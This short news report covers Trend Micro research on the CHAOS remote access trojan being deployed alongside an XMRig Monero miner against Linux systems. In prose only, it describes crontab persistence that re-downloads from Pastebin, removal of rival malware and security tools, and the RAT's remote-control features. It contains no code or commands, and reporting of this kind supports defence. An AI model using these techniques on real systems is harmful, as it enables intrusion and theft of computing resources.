An open-source remote access trojan (RAT) known as CHAOS was utilized in a cryptocurrency mining attack against the Linux operating system.
The threat, which was identified by Trend Micro in November 2022, remains virtually unchanged in all other respects, including the elimination of competing for malware and security software, as well as the deployment of the Monero (XMR) cryptocurrency miner.
“The malware achieves persistence by modifying the /etc/crontab file, a UNIX task scheduler that downloads itself every 10 minutes from Pastebin,” researchers David Fiser and Alfredo Oliveira explained.
This phase concludes with the download of subsequent-stage payloads consisting of the XMRig miner and the Go-based CHAOS RAT.
The main downloader script and additional payloads are hosted in multiple locations, according to the cybersecurity firm, to ensure that the campaign remains active and new infections continue to occur.
Once downloaded and executed, the CHAOS RAT transmits detailed system metadata to a remote server, in addition to being able to perform file operations, capture screenshots, shut down and restart the computer, and open arbitrary URLs.
“On the surface, the incorporation of a RAT into the infection routine of cryptocurrency mining malware may appear minor,” the researchers said.
“However, given the tool’s variety of functions and the fact that this evolution demonstrates that cloud-based threat actors are still evolving their campaigns, it is crucial for both organizations and individuals to maintain heightened security vigilance.”